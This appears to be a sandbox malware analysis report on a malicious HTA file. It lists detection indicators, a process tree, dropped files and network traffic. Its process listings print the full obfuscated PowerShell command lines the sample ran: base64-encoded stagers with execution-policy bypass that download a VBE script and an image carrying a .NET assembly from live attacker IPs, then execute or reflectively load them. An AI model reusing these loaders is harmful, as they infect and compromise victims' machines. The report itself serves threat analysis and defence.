File name:

botharefgoodformajorworktogivebestthignstodobetter.hta

Full analysis: https://app.any.run/tasks/3c6292d2-7105-4fe5-a8d2-85851e997757
Verdict: Malicious activity
Analysis date: May 19, 2025, 17:44:05
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (29407), with no line terminators
MD5:

FAC0940EB10EF7DD57EA7348D1176D02

SHA1:

5F5F6A707F54B9060B1CA82F3C1233D52751F724

SHA256:

7669571AB106028C768CA287ED8D40F62F74A8620A1814E00906BF5019648B24

SSDEEP:

96:/1I4kBWg4v+Wnkn9gLImHQhHHAHjEQD4R74cAkqe5WOwC4s:/1cBWWWnkn9sImHknejE9Akqe5WOwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 7000)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1300)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5960)

    • Starts Visual C# compiler

      • powershell.exe (PID: 1300)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 1300)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1532)

  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7000)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7000)
      • wscript.exe (PID: 6644)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1300)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 1072)

    • Uses .NET C# to load dll

      • powershell.exe (PID: 1300)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Connects to the server without a host name

      • powershell.exe (PID: 1300)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 1072)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6644)

    • Executes script without checking the security policy

      • powershell.exe (PID: 1532)
      • powershell.exe (PID: 1300)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7000)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Checks supported languages

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 1072)

    • Checks proxy server information

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Create files in a temporary directory

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 5960)
      • powershell.exe (PID: 1532)

    • Disables trace logs

      • powershell.exe (PID: 1532)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 1532)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Reads the software policy settings

      • slui.exe (PID: 3888)

    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 1300)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
12
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe csc.exe cvtres.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1072"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nkcfha5o.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1300pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1532"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$mavis = 'JABvAHYAZQByAHQAaQBsAHQAIAA9ACAAJwB0AHgAdAAuAHIAZQB0AHQAZQBiAG8AZABvAHQAcwBuAGcAaQBoAHQAdABzAGUAYgBlAHYAaQBnAG8AdABrAHIAbwB3AHIAbwBqAGEAbQByAG8AZgBkAG8AbwBnAGYAZQByAGEAaAB0AG8AYgAvADAANwA5AC8ANAA2ADEALgA3ADQALgAzADcAMQAuADcAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAYwBlAG4AdAByAGkAcwBjAGkAZgBvAHIAbQBlAHMAIAA9ACAAJABvAHYAZQByAHQAaQBsAHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAHQAcgBlAGEAYwBoAGUAcgBzACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgAxADMANwAuADIAMgAuADEAMAAxAC8AeABhAG0AcABwAC8AYwB2AC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJAB0AGkAbQBlAHoAbwBuAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABpAG0AZQB6AG8AbgBlAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGQAZQBtAG8AbgBpAHMAZQBkACAAPQAgACQAdABpAG0AZQB6AG8AbgBlAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHQAcgBlAGEAYwBoAGUAcgBzACkAOwAkAGQAbwBzAGEAZwBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABlAG0AbwBuAGkAcwBlAGQAKQA7ACQAYQBtAGUAbgBkAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABhAGMAbgBlAHMAdABpAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcAByAGUAYwBsAGEAcgBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAG0AZQBuAGQAZQByAHMAKQA7ACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAGMAbgBlAHMAdABpAHMAKQA7ACQAcAByAGUAYwBsAGEAcgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAALQBnAHQAIAAkAHAAcgBlAGMAbABhAHIAZQA7ACQAcAByAGUAYwBsAGEAcgBlACAAKwA9ACAAJABhAG0AZQBuAGQAZQByAHMALgBMAGUAbgBnAHQAaAA7ACQAbgBvAG4AZQBtAGUAdABpAGMAIAA9ACAAJAB0AHIAYQBuAHEAdQBpAGwAaQBzAGUAIAAtACAAJABwAHIAZQBjAGwAYQByAGUAOwAkAGYAZQBlAGQAdABoAHIAbwB1AGcAaAAgAD0AIAAkAGQAbwBzAGEAZwBlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHAAcgBlAGMAbABhAHIAZQAsACAAJABuAG8AbgBlAG0AZQB0AGkAYwApADsAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGUAZQBkAHQAaAByAG8AdQBnAGgAKQA7ACQAYwBoAGEAcABlAHIAbwBuAG4AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQApADsAJABzAGgAbwBwAHcAbwByAG4AIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABjAGUAbgB0AHIAaQBzAGMAaQBmAG8AcgBtAGUAcwAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwB1AG4AYwBsAGkAbQBiAGUAZAAnACwAJwB2AGIAcwAnACwAJwAnACwAJwAnACwAJwBTAGEAaQBvAG4AagBpACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$palmad = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($mavis));Invoke-Expression $palmad;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2504\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3096C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
3888"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5376C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDA54.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
5960"C:\WINDOWS\system32\cmd.exe" "/C pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))"C:\Windows\SysWOW64\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6576C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
15 030
Read events
15 008
Write events
22
Delete events
0

Modification events

(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
4
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_plb444vq.flm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1072csc.exeC:\Users\admin\AppData\Local\Temp\nkcfha5o.outtext
MD5:00C08D692B63F41922547A7783D92397
SHA256:75C7F70DEBCC8A320A4767FF0AD5E4D018BE14826F043BF1122AFF97FE611360
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lefbshjd.rj3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3252B37D83421C22EF5C9D59215D4B48
SHA256:B3F0000B0683F43E8435A84D61B17F7258104DE45E87CBDB2025D9C6135600B8
5376cvtres.exeC:\Users\admin\AppData\Local\Temp\RESDA54.tmpbinary
MD5:15505B1C8CDA2C36298F50E00CEECB4D
SHA256:23FF466BF146093D12C27FAF605407154E0A68ECEBA71EE21689107517E7B98D
1300powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\botharefgoodformajorworktogivebestthignstodobetter[1].vbetext
MD5:40F1A3A2E6B8667536485C07BECC73E9
SHA256:D481255082C01A231D390EAD7547C0E6B2B342DE599BE3173B2EC7483DB6A4AA
1532powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8B8A832FCE2174C8FEE26B70F2483FBB
SHA256:0FBA3A37EF443507F533A7C3F31C0B5826EA416B95FDE43479E02D4E0C29400B
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c1arheht.3jw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pulkxdb4.eiv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1072csc.exeC:\Users\admin\AppData\Local\Temp\nkcfha5o.dllexecutable
MD5:01838917EB83452F6BBE5F25D685CDD6
SHA256:CC05A11028CE57655BAAF832E75C88E9D8CCF97D6F408DA764C1410DE7878320
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1300
powershell.exe
GET
200
107.173.47.164:80
http://107.173.47.164/970/botharefgoodformajorworktogivebestthignstodobetter.vbe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1300
powershell.exe
107.173.47.164:80
